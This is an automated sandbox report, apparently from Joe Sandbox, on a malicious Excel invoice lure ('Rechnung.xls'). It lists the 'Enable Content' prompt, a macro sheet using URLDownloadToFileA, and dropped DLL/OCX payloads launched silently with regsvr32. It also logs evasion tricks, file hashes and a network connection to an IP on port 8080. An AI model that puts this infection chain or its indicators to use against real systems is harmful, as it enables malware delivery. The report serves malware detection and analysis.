                      Source: Yara matchFile source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.938265280.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.943507589.00000000002F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1240660919.00000000002E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: Screenshot number: 4 Screenshot OCR: Enable Editing and click Enable Content.
                      Source: Screenshot number: 4 Screenshot OCR: Enable Content.
                      Source: Rechnung.xls Macro extractor: Sheet: PKEKPPGEKKPGE contains: URLDownloadToFileA
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll
                      Source: Rechnung.xls Initial sample: EXEC
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\system32\ITAzDMJQNXvQb\
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800026DC4_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002ADC4_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002ACE84_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800150F04_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001E2F44_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016AF44_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DEF44_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001DEFC4_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800125004_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800063084_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001370C4_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A10C4_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180028D104_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800201184_2_0000000180020118
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180004B184_2_0000000180004B18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A5244_2_000000018001A524
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015F244_2_0000000180015F24
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F3284_2_000000018000F328
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180002D284_2_0000000180002D28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E1304_2_000000018000E130
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800291344_2_0000000180029134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800081344_2_0000000180008134
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800217384_2_0000000180021738
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002AF384_2_000000018002AF38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800221404_2_0000000180022140
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800283484_2_0000000180028348
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000DB4C4_2_000000018000DB4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180014F504_2_0000000180014F50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000B3504_2_000000018000B350
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800069544_2_0000000180006954
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000F5544_2_000000018000F554
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002975C4_2_000000018002975C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002B5644_2_000000018002B564
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800121684_2_0000000180012168
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135684_2_0000000180013568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800243704_2_0000000180024370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800083704_2_0000000180008370
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800157744_2_0000000180015774
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800123784_2_0000000180012378
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800191784_2_0000000180019178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800251804_2_0000000180025180
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800019804_2_0000000180001980
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800215884_2_0000000180021588
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001A9884_2_000000018001A988
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800181904_2_0000000180018190
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800139944_2_0000000180013994
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180026B984_2_0000000180026B98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800289984_2_0000000180028998
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001CF9C4_2_000000018001CF9C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000359C4_2_000000018000359C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001EBA04_2_000000018001EBA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800061A04_2_00000001800061A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135A64_2_00000001800135A6
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180016DA84_2_0000000180016DA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800059AC4_2_00000001800059AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000D7AC4_2_000000018000D7AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800053B04_2_00000001800053B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800135B44_2_00000001800135B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018001C1B84_2_000000018001C1B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180015BB84_2_0000000180015BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800025B84_2_00000001800025B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800207BC4_2_00000001800207BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800085BC4_2_00000001800085BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800015C04_2_00000001800015C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000FFC04_2_000000018000FFC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800295C84_2_00000001800295C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800229CC4_2_00000001800229CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000E5D44_2_000000018000E5D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018002A5D84_2_000000018002A5D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800173DC4_2_00000001800173DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180018BDC4_2_0000000180018BDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800261E04_2_00000001800261E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800162BC6_2_00000001800162BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800270C06_2_00000001800270C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800280C86_2_00000001800280C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AEC86_2_000000018001AEC8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800050D46_2_00000001800050D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800234D86_2_00000001800234D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F6DC6_2_000000018001F6DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026DC6_2_00000001800026DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002ADC6_2_0000000180002ADC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002ACE86_2_000000018002ACE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800150F06_2_00000001800150F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E2F46_2_000000018001E2F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016AF46_2_0000000180016AF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000DEF46_2_000000018000DEF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DEFC6_2_000000018001DEFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125006_2_0000000180012500
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800241046_2_0000000180024104
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800063086_2_0000000180006308
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001370C6_2_000000018001370C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A10C6_2_000000018001A10C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028D106_2_0000000180028D10
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DBD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753BD70 appears 113 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74D7FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF7537FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D27FF0 appears 31 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF74DB3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF753B3B0 appears 148 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 000007FEF9D2BD70 appears 113 times
                      Source: Rechnung.xls Macro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll 278D0C0BAF0203C13A5E72F31027F4FD0921F6FA2A84656485D86F8D09D562C0
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll CAE8D1C14C85D10D7413AF876E6748813AD6930CF4D856E120857C4489A690DA
                      Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll 90498F1EE590DA28566434C15EFCFD98E829846F233387553EA655FC7559168D
                      Source: Rechnung.xls Virustotal: Detection: 42%
                      Source: Rechnung.xls ReversingLabs: Detection: 34%
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                      Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Windows\System32\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6C68.tmp
                      Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@15/16@5/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                      Source: Rechnung.xls OLE indicator, Workbook stream: true
                      Source: Rechnung.xls.0.dr OLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180006F2C CloseHandle,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exe File read: C:\Windows\System32\drivers\etc\hosts
                      Source: Window Recorder Window detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                      Source: Rechnung.xls Initial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000D15D push ebx; retn 0068h 3_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000C892 push ebp; retf 5_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000D095 push B3B8007Eh; iretd 5_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000D0F3 push ebp; iretd 5_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_0000000180013551 push ebx; retf 5_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000D15D push ebx; retn 0068h 5_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000CDA8 push ebp; iretd 5_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000000018000CE36 push 458B0086h; iretd 5_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_0000000180013551 push ebx; retf 6_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000C892 push ebp; retf 7_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000D095 push B3B8007Eh; iretd 7_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000D0F3 push ebp; iretd 7_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_0000000180013551 push ebx; retf 7_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000D15D push ebx; retn 0068h 7_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000CDA8 push ebp; iretd 7_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000000018000CE36 push 458B0086h; iretd 7_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_0000000180013551 push ebx; retf 8_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: uxevr1.ocx.0.dr Static PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: uxevr3.ocx.0.dr Static PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: uxevr2.ocx.0.dr Static PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: me435CErJsFGw1q[1].dll.0.dr Static PE information: real checksum: 0x654f5 should be: 0x66558
                      Source: klJrMZJhgldiJr6j0XWPeZOiGs[1].dll.0.dr Static PE information: real checksum: 0x654f5 should be: 0x5c302
                      Source: RD05UTHGkitvIJt[1].dll.0.dr Static PE information: real checksum: 0x654f5 should be: 0x5bd5c
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\GistaKepWrpVA\oAaDhgd.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\ITAzDMJQNXvQb\pSYwk.dll (copy)
                      Source: C:\Windows\System32\regsvr32.exe File created: C:\Windows\System32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll (copy)
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll

                      Boot Survival

                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr1.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr3.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\uxevr2.ocx

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe File opened: C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll:Zone.Identifier read attributes | delete
                      Source: C:\Windows\System32\regsvr32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\regsvr32.exe TID: 672 Thread sleep time: -360000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2576 Thread sleep time: -240000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 280 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2020 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2628 Thread sleep time: -120000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe TID: 2648 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\System32\regsvr32.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess graph_3-16375
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\klJrMZJhgldiJr6j0XWPeZOiGs[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\RD05UTHGkitvIJt[1].dll
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\me435CErJsFGw1q[1].dll
                      Source: C:\Windows\System32\regsvr32.exe API coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exe API coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exe API coverage: 7.3 %
                      Source: C:\Windows\System32\regsvr32.exe Process information queried: ProcessInformation
                      Source: C:\Windows\System32\regsvr32.exe Code function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exe Code function: 6_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,6_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exe Code function: 8_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,8_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16377
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_3-16481
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_5-16481
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node graph_5-16668
                      Source: C:\Windows\System32\regsvr32.exe API call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exe File Volume queried: C:\ FullSizeInformation
                      Source: regsvr32.exe, 00000007.00000002.953259566.00000000000FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exe Code function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF7533280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF7533280
                      Source: C:\Windows\System32\regsvr32.exe Code function: 5_2_000007FEF753BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF753BE50
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF74D3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_000007FEF74D3280
                      Source: C:\Windows\System32\regsvr32.exe Code function: 7_2_000007FEF74DBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000007FEF74DBE50

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Windows\System32\regsvr32.exe Network Connect: 173.82.82.196 8080
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ITAzDMJQNXvQb\pSYwk.dll"
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"
                      Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"
                      Source: C:\Windows\System32\regsvr32.exe Queries volume information: C:\ VolumeInformation
